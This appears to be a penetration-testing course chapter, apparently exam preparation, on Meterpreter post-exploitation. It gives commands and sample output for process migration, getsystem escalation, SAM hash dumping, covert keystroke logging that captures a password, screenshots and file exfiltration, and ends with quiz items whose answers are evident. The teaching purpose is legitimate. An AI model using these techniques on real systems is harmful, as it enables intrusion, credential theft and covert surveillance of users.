6.3 Meterpreter Post-Exploitation Deep Dive

Key Takeaways

  • Meterpreter operates entirely in volatile system memory via Reflective DLL Injection, maintaining encrypted TLS communication and avoiding physical disk artifacts.

  • Process migration transfers the Meterpreter payload from volatile attack vectors into stable system processes (explorer.exe or svchost.exe) to prevent connection dropouts.

  • The getsystem command automates Windows privilege escalation to NT AUTHORITY\SYSTEM through named pipe impersonation and token duplication techniques.

  • Covert post-exploitation capabilities include in-memory keystroke sniffing (keyscan_start), dynamic screen capture (screenshot), file transfers, and automated host profiling modules.

Last updated: October 2026

6.3 Meterpreter Post-Exploitation Deep Dive

Gaining an initial foothold on a target system is only the first step in a penetration test. Once execution is achieved, an offensive security professional must understand what security boundaries exist, what privileges are assigned to the compromised process, and how to maneuver within the host without causing service disruptions or alerting defensive monitoring systems.

Meterpreter is an advanced, dynamically extensible post-exploitation payload designed specifically for stealth, operational flexibility, and forensic evasion. Unlike standard command shells (cmd.exe or /bin/sh) which spawn native operating system processes that write temporary files to disk, Meterpreter executes entirely within volatile memory (RAM). Understanding its architecture, core operational commands, privilege escalation mechanisms, and surveillance modules allows a penetration tester to extract critical intelligence and maintain stable command-and-control.


Meterpreter Architecture & In-Memory Operations

Meterpreter's stealth and resilience stem from its underlying design, pioneered by security researcher Stephen Fewer through Reflective DLL Injection (RDI).

+---------------------------------------------------------------------------------------+
|                         REFLECTIVE DLL INJECTION (RDI)                                |
+---------------------------------------------------------------------------------------+
| 1. Attacker transmits Meterpreter DLL over encrypted TLS socket to victim stager.      |
| 2. Stager allocates RWX (Read-Write-Execute) memory inside the host process via       |
|    VirtualAlloc() or mmap().                                                          |
| 3. In-memory Reflective Loader parses the DLL's internal PE headers, resolves symbols, |
|    relocates memory addresses, and executes DllMain().                                |
| 4. Meterpreter executes completely inside RAM without ever touching the physical disk.|
+---------------------------------------------------------------------------------------+

Reflective DLL Injection Mechanics

In standard Windows environments, loading a dynamic link library (.dll) requires the operating system loader via the LoadLibrary() API call. This standard process mandates that the DLL exist as a physical file on the filesystem and generates registry and file integrity monitoring (FIM) events.

Reflective DLL injection bypasses this requirement entirely:

  1. The Meterpreter stager allocates a block of memory with Read, Write, and Execute (RWX) permissions inside the target process using the Windows VirtualAlloc() API.
  2. The stager writes the raw Meterpreter core DLL directly into this newly allocated memory buffer.
  3. Execution is transferred to an embedded Reflective Loader function compiled within the DLL itself. This loader mimics the Windows OS loader: it parses the DLL's internal Portable Executable (PE) headers, resolves external API imports directly from kernel32.dll and ntdll.dll, applies base relocations, and invokes DllMain().
  4. Because the file never touches the physical hard drive, traditional file-system antivirus scanners scanning for disk writes are completely bypassed.

Encrypted TLS Communications

All network communications between the Meterpreter client on the victim and the Metasploit multi-handler are conducted over encrypted Transport Layer Security (TLS) sockets using a binary Type-Length-Value (TLV) protocol. Because payloads and commands are transmitted through an encrypted tunnel, Network Intrusion Detection Systems (NIDS) and packet analyzers cannot inspect command strings, process listings, or exfiltrated data.

Dynamic Modular Extensibility

The base Meterpreter payload is intentionally lightweight. Specialized operational extensions are loaded dynamically across the encrypted socket on demand using the load command. Common extensions include:

  • load kiwi: Loads the updated Mimikatz credential extraction suite into target memory.
  • load priv: Injects privilege escalation routines and token manipulation modules.
  • load extapi: Adds extended Windows management APIs (clipboard sniffing, service control).
  • load espia: Provides image and audio surveillance capabilities.

Core System Commands & Process Migration

Upon establishing a Meterpreter session, the operator's immediate priority is environmental profiling: determining system architecture, checking user privileges, and migrating into a stable process.

System Profiling and Identity Auditing

# Display target hostname, OS release, kernel build, and system architecture
meterpreter > sysinfo
Computer        : WIN-DEV-SERVER
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/windows

# Query the security context of the current session
meterpreter > getuid
Server username: WIN-DEV-SERVER\jdoe

# Identify the current process ID hosting the Meterpreter payload
meterpreter > getpid
Current pid: 3844

Process Migration with migrate

Initial exploitation frequently lands in a vulnerable host process that is unstable. For example, exploiting a web server buffer overflow may leave the web daemon in a corrupted state, or a user-launched exploit payload may terminate as soon as the user closes an application window. To ensure session survival, the penetration tester must migrate the Meterpreter thread into a long-running, stable process.

# List all running processes on the target
meterpreter > ps

Process List
============
 PID   PPID  Name          Arch  Session  User                          Path
 ---   ----  ----          ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System        x64   0
 688   580   svchost.exe   x64   0        NT AUTHORITY\SYSTEM          C:\Windows\System32\svchost.exe
 1240  688   spoolsv.exe   x64   0        NT AUTHORITY\SYSTEM          C:\Windows\System32\spoolsv.exe
 3412  1120  explorer.exe  x64   1        WIN-DEV-SERVER\jdoe          C:\Windows\explorer.exe
 3844  3412  vuln_app.exe  x86   1        WIN-DEV-SERVER\jdoe          C:\Program Files\app.exe

Migrate into a stable process using its Process ID (PID) or process name:

# Migrate by Process ID (e.g., explorer.exe at PID 3412)
meterpreter > migrate 3412
[*] Migrating from 3844 to 3412...
[*] Migration completed successfully.

# Alternatively, migrate by executable name
meterpreter > migrate -N explorer.exe
Candidate ProcessTarget ContextStability LevelStrategic Rationale & Operational Notes
explorer.exeStandard Logged-in UserHighThe primary graphical desktop shell. Remains active for the user's entire login session. Optimal for keystroke logging.
svchost.exeNT AUTHORITY\SYSTEMVery HighCore Windows service host. Multiple instances run continuously; blends in with standard system traffic.
spoolsv.exeNT AUTHORITY\SYSTEMHighThe Windows Print Spooler daemon. Persistent background system service; rarely monitored by casual audits.
lsass.exeNT AUTHORITY\SYSTEMHigh RiskLocal Security Authority Subsystem. Critical process; if a migration attempt fails, the OS triggers an immediate system restart.
notepad.exeStandard UserVery LowEphemeral process; terminates whenever the user exits the editor. Avoid for persistence.
cmd.exeAny ContextLowCommand prompt processes are heavily scrutinized by Security Operations Centers (SOCs) and EDR heuristics.

Automated Privilege Escalation with getsystem

If the compromised user context is not SYSTEM (such as a local administrator operating under User Account Control constraints), Meterpreter provides the getsystem command to automate elevation to NT AUTHORITY\SYSTEM:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In-Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Under the hood, getsystem attempts four distinct elevation techniques:

  1. Technique 1 (Named Pipe Impersonation - In Memory): Meterpreter creates a named pipe, connects to it with a service running under SYSTEM privileges, and calls the Windows ImpersonateNamedPipeClient() API to assume the security token of the connecting service.
  2. Technique 2 (Named Pipe Impersonation - Dropping DLL): Similar to Technique 1, but drops a temporary helper DLL to disk to trigger the service connection.
  3. Technique 3 (Token Duplication): Directly searches running processes for existing SYSTEM tokens and duplicates them via OpenProcessToken() and DuplicateTokenEx().
  4. Technique 4 (Named Pipe Impersonation via RPCSS): Binds to the RPC Service Manager to force a privileged named pipe connection.

Dropping to Native Shell and Backgrounding Sessions

  • To drop from Meterpreter into an interactive operating system command shell, issue shell (which launches cmd.exe on Windows or /bin/sh on Linux). Type exit inside the shell to return to Meterpreter.
  • To return to the main Metasploit console without killing the session, issue background or press Ctrl+Z followed by y.
  • List active sessions with sessions -l and resume an active session with sessions -i <session_id>.

File System Operations & Data Exfiltration

Meterpreter includes robust built-in file management commands that allow operators to navigate directories, upload assessment binaries, search for flags, and exfiltrate sensitive files without spawning noisy command shell processes.

Navigation and Directory Commands

Meterpreter maintains separate concepts of remote directory (on the target) and local directory (on your Kali machine):

  • pwd / cd <path>: View and change the working directory on the target host.
  • lpwd / lcd <path>: View and change the local working directory on the attacker's Kali machine.
  • ls or dir: List directory contents with file sizes, permissions, and timestamps.
  • cat <remote_file>: Print the plaintext contents of a file directly to the console.
  • edit <remote_file>: Open a remote file in the attacker's local text editor (e.g., Vim) over the encrypted socket.

Bidirectional File Transfers

Moving tools onto the victim and retrieving sensitive data are accomplished using upload and download:

# Upload a local enumeration tool to the target's temporary directory
meterpreter > upload /usr/share/windows-resources/binaries/nc.exe C:\\Windows\\Temp\\nc.exe
[*] uploading  : /usr/share/windows-resources/binaries/nc.exe -> C:\Windows\Temp\nc.exe
[*] uploaded   : /usr/share/windows-resources/binaries/nc.exe -> C:\Windows\Temp\nc.exe

# Download a sensitive configuration file or dynamic exam flag to Kali
meterpreter > download C:\\Users\\Administrator\\Desktop\\flag.txt /root/loot/flag.txt
[*] downloading: C:\Users\Administrator\Desktop\flag.txt -> /root/loot/flag.txt
[*] downloaded : C:\Users\Administrator\Desktop\flag.txt -> /root/loot/flag.txt

Recursive File Discovery with search

Locating sensitive documents, passwords, or flags across large directory trees can be automated using Meterpreter's search command:

# Search for text files containing 'flag' on the C: drive
meterpreter > search -f *flag*.txt -d C:\\
Found 2 results...
    C:\Users\Public\flag1.txt (32 bytes)
    C:\Users\Administrator\Desktop\flag2.txt (32 bytes)

# Search for configuration files containing database passwords
meterpreter > search -f *.config -d C:\\inetpub\\wwwroot\\

Advanced Post-Exploitation Modules & Surveillance

Beyond basic command execution, Meterpreter serves as a launcher for post-exploitation automation modules and real-time surveillance operations.

Running Post-Exploitation Gather Modules

Metasploit includes hundreds of post modules designed to execute against established sessions using the run command inside Meterpreter:

# Enumerate logged-on users and active remote desktop sessions
meterpreter > run post/windows/gather/enum_logged_on_users

# Detect virtualization environments (VMware, VirtualBox, Hyper-V, QEMU)
meterpreter > run post/windows/gather/checkvm

# Extract local SAM database password hashes into the Metasploit database
meterpreter > run post/windows/gather/smart_hashdump

# Enumerate installed software and missing Windows security updates
meterpreter > run post/windows/gather/enum_patches

Keystroke Logging (Sniffing)

Meterpreter provides in-memory keystroke logging without writing files to disk. To capture keystrokes reliably, the Meterpreter session must be migrated into a process that the target user actively interacts with (such as explorer.exe, chrome.exe, or wordpad.exe):

# 1. Migrate into the user's interactive desktop process
meterpreter > migrate -N explorer.exe

# 2. Start the in-memory keystroke capturing hook
meterpreter > keyscan_start
Starting the keystroke sniffer...

# 3. Interrogate the buffer and dump intercepted keystrokes
meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator <Shift>P@ssw0rd2026! <Return>
https://internal.corp/admin <Return>

# 4. Terminate the keystroke sniffer hook when finished
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

Visual Surveillance and Screen Capture

To view what the target user is currently seeing on their monitor, issue the screenshot command. Meterpreter captures the desktop frame buffer and saves it as a JPEG file locally on the attacker's system:

meterpreter > screenshot
[*] Screenshot saved to: /root/loot/eJpt_desktop_capture.jpeg
CommandParameters / OptionsSubsystemFunctional Purpose & Tactical Use
sysinfoNoneHost ProfilingDisplays target hostname, OS release, kernel architecture, and language.
getuidNoneIdentity AuditingPrints the active user account and security context of the current session.
getpidNoneProcess AuditingIdentifies the Process ID (PID) currently hosting the Meterpreter payload.
psNoneProcess AuditingLists all running processes, process IDs, parent PIDs, and user contexts.
migrate<pid> or -N <name>Process InjectionInjects Meterpreter into another active process to guarantee session persistence.
getsystem-t <technique_id>Privilege EscalationElevates privileges to NT AUTHORITY\SYSTEM via named pipe impersonation.
shellNoneShell ExecutionSpawns an interactive operating system command interpreter (cmd.exe or /bin/sh).
upload<local_src> <remote_dst>File TransferCopies tools, scripts, or binaries from Kali to the victim machine.
download<remote_src> <local_dst>Data ExfiltrationCopies sensitive files, flags, or configuration archives from victim to Kali.
search-f <pattern> -d <dir>File DiscoveryRecursively searches directories for specific filenames, extensions, or patterns.
keyscan_startNoneSurveillanceInjects in-memory keyboard event hook to record user keystrokes covertly.
keyscan_dumpNoneSurveillanceDumps captured keystrokes from memory buffer directly to the operator console.
screenshotNoneSurveillanceGrabs a bitmap screenshot of the active user desktop and saves it locally.
Test Your Knowledge

What is the primary architectural and anti-forensic advantage of Meterpreter's Reflective DLL Injection (RDI) compared to traditional payload execution?

A

It injects the payload directly into volatile process memory without writing binary files to the physical hard drive

B

It automatically patches all operating system vulnerabilities on the target to block competing threat actors

C

It converts all outbound network packets into unencrypted ICMP echo requests to bypass firewalls

D

It reconfigures the target machine's BIOS firmware to ensure persistence across hardware replacements

Test Your Knowledge

A penetration tester compromises a Windows server through an unpatched web application service running under a local user account. Which immediate operational action prevents the session from terminating if the web daemon crashes?

A

Executing the reboot command inside Meterpreter to force the machine into safe mode

B

Running upload nc.exe C:\Windows\System32\nc.exe to replace the command interpreter

C

Listing active processes with ps and migrating the Meterpreter payload into explorer.exe or svchost.exe

D

Issuing getsystem -t 2 to permanently lock the operating system process table

Test Your Knowledge

A penetration tester needs to capture administrative credentials entered by a logged-in user on a Windows target. What is the correct sequence of Meterpreter actions required to sniff keystrokes?

A

Issue download /var/log/auth.log followed by cat credentials.txt

B

Run getsystem, followed by execute -f cmd.exe -i and entering echo %password%

C

Execute run post/windows/gather/checkvm and issue screenshot every 5 seconds

D

Migrate into the target user's interactive explorer.exe process, execute keyscan_start, and retrieve inputs with keyscan_dump

Sections you finish are checked off in the contents.